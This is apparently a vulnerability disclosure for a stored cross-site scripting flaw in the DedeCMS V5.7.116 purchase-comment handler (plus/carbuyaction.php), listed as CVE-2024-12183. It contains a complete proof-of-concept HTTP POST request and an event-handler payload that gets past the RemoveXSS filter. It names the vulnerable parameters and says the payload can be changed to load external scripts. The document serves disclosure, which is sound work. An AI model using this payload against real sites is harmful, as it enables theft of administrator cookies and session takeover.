DedeCMS V5.7.116 Stored XSS Vulnerability

[Hebing123]

Summary

A stored XSS vulnerability has been identified in DedeCMS V5.7.116.
Attackers can exploit this vulnerability by maliciously inserting an XSS payload in the comment section during the purchase of goods.

Details

The vulnerability is located in the file plus/carbuyaction.php. Our analysis indicates that all parameters are passed through the RemoveXSS method.

However, our payload can bypass the RemoveXSS method's filtering for XSS vulnerabilities, thus any script that relies solely on the RemoveXSS method to filter parameter values and displays these values on the page is vulnerable.

Steps

The attacker, posing as a regular user, purchases goods and adds a malicious comment.

An administrator opens the order details in the backend, triggering the stored XSS vulnerability.

POC

POST /plus/carbuyaction.php HTTP/1.1
Host: target-ip
Content-Length: 168
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

do=clickout&pid=1&paytype=1&address=test<body%20onpointermove="alert(document.cookie)">&postname=test&email=test%40qq.com&tel=13263888888&zip=300033&des=123&vdcode=0000

Parameters that are vulnerable: des, postname, email, address.
It is worth noting that some parameters may have maximum length restrictions.
We provide a proof of concept that can bypass the RemoveXSS method:

<body onpointermove="alert(document.cookie)">

Of course, we can also bring in external js scripts by modifying the xss payload.

[Hebing123]

CVE-2024-12183